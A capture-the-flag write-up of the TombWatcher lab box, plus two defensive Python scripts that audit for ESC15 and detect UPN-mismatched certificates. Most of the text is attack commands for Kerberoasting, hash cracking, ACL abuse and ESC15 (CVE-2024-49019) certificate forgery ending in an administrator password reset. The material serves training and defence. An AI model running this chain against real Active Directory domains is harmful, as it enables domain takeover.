Tomb Watcher

The document outlines a vulnerability in Active Directory Certificate Services (AD CS) that allows privilege escalation through certificate-based authentication, specifically detailing the exploitation process using certipy. It provides a series of commands and scripts for executing the attack, including user credential management and certificate requests. The guide emphasizes the security risks associated with unpatched AD CS servers and the potential for non-privileged users to issue high-privilege certificates.

Uploaded by

fayzullayevich15
TombWatcher

This box has a vulnerability in Active Directory Certificate Services (AD CS) that allows an attacker to escalate privileges by misusing certificate-based authentication. This guide demonstrates how to exploit this vulnerability using certipy.

💡 As is common in real-life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

nxc smb tombwatcher.htb -u henry -p 'H3nry_987TGV!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}'

faketime "$(ntpdate -q dc01.tombwatcher.htb | cut -d ' ' -f 1,2)" python3 targetedKerberoast.py -v -d tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!'

john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt alfred_hash

bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u 'ansible_dev$' -p :1c37d00093dc2a5f25176bf2d474afdc set password 'SAM' 'Password123!'

python3 /usr/share/doc/python3-impacket/examples/owneredit.py -action write -target 'john' -new-owner 'sam' 'tombwatcher.htb'/'sam':'Password123!' -dc-ip 10.10.11.72

bloodyAD -u 'alfred' -p 'basketball' -d tombwatcher.htb --dc-ip 10.10.11.72 add groupMember INFRASTRUCTURE alfred

impacket-dacledit -action write -rights 'WriteMembers' -principal "john" -target-dn "CN=JOHN,CN=USERS,DC=TOMBWATCHER,DC=HTB" 'tombwatcher.htb'/'sam':'Password123!' -dc-ip 10.10.11.72

bloodyAD --host 10.10.11.72 -d "tombwatcher.htb" -u "sam" -p 'Password123!' add genericAll "john" "sam"

bloodyAD --host 10.10.11.72 -d "tombwatcher.htb" -u "sam" -p 'Password123!' set password "john" 'Feb@2015'

evil-winrm -i 10.10.11.72 -u john -p Feb@2015

Exploiting CVE-2024-49019: Certificate Authority Privilege Escalation

Find the deleted cert_admin object:

Get-ADObject -filter {SamAccountName -eq 'cert_admin'} -IncludeDeletedObjects

OR

Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects

After obtaining the ObjectGUID of the deleted object, restore it.


Restore-ADObject -Identity 938182c3-bf0b-410a-9aaa-45c8e1a02ebf

Confirm that the object has been restored by querying the object properties.
Get-ADUser -Identity cert_admin -Properties *

Enable the restored AD account if its properties show it as disabled.

Enable-ADAccount -Identity cert_admin

And change the password.


Set-ADAccountPassword -Identity cert_admin -Reset -NewPassword (ConvertTo-SecureString "Feb@2015" -AsPlainText -Force)

I used certipy to list all certificate templates that are vulnerable because the AD CS server is unpatched.
certipy find -u cert_admin@tombwatcher.htb -p 'Feb@2015' -dc-ip 10.10.11.72 -vulnerable

💡 From the results, the server is vulnerable to CVE-2024-49019. ESC15 vulnerabilities allow non-privileged users to issue certificates that can authenticate as high-privileged accounts, posing a severe security threat.

https://learn.microsoft.com/en-us/defender-for-identity/prevent-certificate-enrollment-esc15
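For the defender side of the ESC15 finding above, here is an added audit script that is not part of this write-up and not certipy's code. It evaluates the three preconditions ESC15 depends on (a schema-version-1 template, the enrollee supplying the subject, and enrollment open to broad groups) over template records. The records are constructed for the demo; the attribute names are the real AD schema names you would read from the Certificate Templates container in the Configuration partition, but the values, principals and the `enroll_principals` / `manager_approval` keys are assumptions about how you flatten the template ACL.

```python
"""Audit AD CS certificate templates for the ESC15 (CVE-2024-49019) preconditions.

Added example, not from the TombWatcher write-up or from certipy. Template
records are constructed; attribute names match the AD schema, values are
made up for the demo.
"""

# Real bit in msPKI-Certificate-Name-Flag: the requester controls Subject and SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001

# Principals whose Enroll right means "any domain account can enrol"
# (constructed list; extend with your own broad groups).
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

# Constructed records shaped like a flattened export of
# CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,...
SAMPLE_TEMPLATES = [
    {   # built-in v1 WebServer template with enrollment opened to all users
        "name": "WebServer",
        "msPKI-Template-Schema-Version": 1,
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "enroll_principals": ["Domain Admins", "Domain Users"],
        "manager_approval": False,
    },
    {   # v1 User template: subject and SAN are built from AD, not from the request
        "name": "User",
        "msPKI-Template-Schema-Version": 1,
        "msPKI-Certificate-Name-Flag": 0xA6000000,
        "enroll_principals": ["Domain Users"],
        "manager_approval": False,
    },
    {   # v2 template: carries msPKI-Certificate-Application-Policy, so the CA
        # applies the template's policies instead of the request's (not ESC15)
        "name": "CustomSubjectV2",
        "msPKI-Template-Schema-Version": 2,
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "enroll_principals": ["Domain Users"],
        "manager_approval": False,
    },
    {   # v1 with enrollee-supplied subject, but issuance gated by manager approval
        "name": "ApprovedWebServer",
        "msPKI-Template-Schema-Version": 1,
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "enroll_principals": ["Domain Users"],
        "manager_approval": True,
    },
]


def esc15_findings(template):
    """Return (is_candidate, notes) for one template record; notes explain the verdict."""
    notes = []
    version = template["msPKI-Template-Schema-Version"]
    if version != 1:
        notes.append("schema version %d: template defines its own application policies" % version)
        return False, notes
    notes.append("schema version 1 template")
    if not template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        notes.append("subject is built from AD; requester cannot inject a UPN")
        return False, notes
    notes.append("CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: requester controls subject and SAN")
    broad = sorted(LOW_PRIV_PRINCIPALS.intersection(template["enroll_principals"]))
    if not broad:
        notes.append("enrollment limited to privileged principals")
        return False, notes
    notes.append("enrollment granted to " + ", ".join(broad))
    if template.get("manager_approval"):
        notes.append("manager approval required before issuance")
        return False, notes
    return True, notes


def audit(templates):
    """Names of the templates that satisfy every ESC15 precondition."""
    return [t["name"] for t in templates if esc15_findings(t)[0]]


def mitigations(template):
    """Defensive changes for a flagged template, the CA patch first."""
    steps = ["apply the Windows update that addresses CVE-2024-49019 on every CA"]
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        steps.append("remove CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or replace the template with a v2+ duplicate")
    if LOW_PRIV_PRINCIPALS.intersection(template["enroll_principals"]):
        steps.append("restrict the Enroll right to the accounts that actually need this template")
    if not template.get("manager_approval"):
        steps.append("enable CA certificate manager approval as a compensating control")
    return steps


if __name__ == "__main__":
    for name in audit(SAMPLE_TEMPLATES):
        tpl = next(t for t in SAMPLE_TEMPLATES if t["name"] == name)
        print(name, "->", "; ".join(esc15_findings(tpl)[1]))
        for step in mitigations(tpl):
            print("   -", step)
```

Template data alone cannot tell you whether the CA itself is patched, which is why the patch is always the first mitigation listed; run the audit before and after the update to confirm the remaining exposure is only what the template ACLs allow.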

Request certificate with admin UPN


certipy req -dc-ip 10.10.11.72 -ca 'tombwatcher-CA-1' -target-ip 10.10.11.72 -u cert_admin@tombwatcher.htb -p 'Feb@2015' -template WebServer -upn administrator@tombwatcher.htb -application-policies 'Client Authentication'

Use Certificate for LDAP Shell Access
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.72 -domain tombwatcher.htb -ldap-shell

Within the LDAP shell, change the administrator password:


change_password administrator Feb@2015

Open a new terminal and connect over WinRM with the new password to gain root access.
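The certificate request and authentication steps above leave a clear artefact on the CA: a certificate whose SAN UPN names a different account than the one that requested it. Here is an added detection example, not part of this write-up and not certipy's code, that flags such issuances. The records are constructed; in practice the requester name and template come from the CA database and the UPN from the SAN extension of each issued certificate, and the `PRIVILEGED_ACCOUNTS` watchlist and the `domain_realm` default are assumptions for the demo.

```python
"""Flag issued certificates whose SAN UPN does not belong to the requester.

Added example, not from the TombWatcher write-up or from certipy. Issuance
records are constructed to resemble what you would assemble from the CA
database plus each certificate's SAN extension.
"""

PRIVILEGED_ACCOUNTS = {"administrator", "krbtgt"}   # constructed watchlist

SAMPLE_ISSUANCES = [
    {"request_id": 41, "requester": "TOMBWATCHER\\john", "template": "User",
     "san_upn": "john@tombwatcher.htb"},
    {"request_id": 42, "requester": "TOMBWATCHER\\cert_admin", "template": "WebServer",
     "san_upn": "administrator@tombwatcher.htb"},   # the pattern from this write-up
    {"request_id": 43, "requester": "TOMBWATCHER\\DC01$", "template": "Machine",
     "san_upn": None},                               # machine cert, DNS SAN only
    {"request_id": 44, "requester": "TOMBWATCHER\\sam", "template": "User",
     "san_upn": "Sam@TOMBWATCHER.HTB"},              # same account, different case
]


def split_requester(requester):
    """'DOMAIN\\user' -> ('domain', 'user'), lower-cased for comparison."""
    domain, _, user = requester.rpartition("\\")
    return domain.lower(), user.lower()


def split_upn(upn):
    """'user@realm' -> ('user', 'realm'), lower-cased for comparison."""
    user, _, realm = upn.rpartition("@")
    return user.lower(), realm.lower()


def classify(record, domain_realm="tombwatcher.htb"):
    """Return the reasons an issuance looks suspicious; an empty list means clean."""
    reasons = []
    if not record["san_upn"]:
        return reasons                      # no UPN to impersonate with
    _, req_user = split_requester(record["requester"])
    upn_user, realm = split_upn(record["san_upn"])
    if realm != domain_realm:
        reasons.append("UPN realm %r is not this domain" % realm)
    if upn_user != req_user:
        reasons.append("UPN user %r differs from requester %r" % (upn_user, req_user))
    if upn_user in PRIVILEGED_ACCOUNTS:
        reasons.append("UPN names privileged account %r" % upn_user)
    return reasons


def suspicious_request_ids(records):
    """Request IDs worth a closer look, in database order."""
    return [r["request_id"] for r in records if classify(r)]


if __name__ == "__main__":
    for rec in SAMPLE_ISSUANCES:
        for reason in classify(rec):
            print("request %d (%s via %s): %s"
                  % (rec["request_id"], rec["requester"], rec["template"], reason))
```

Comparing the UPN prefix with the sAMAccountName is a heuristic: in domains where the two legitimately differ, resolve the UPN against AD and compare object SIDs instead, and treat any hit on the privileged watchlist as an incident regardless of who requested it.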
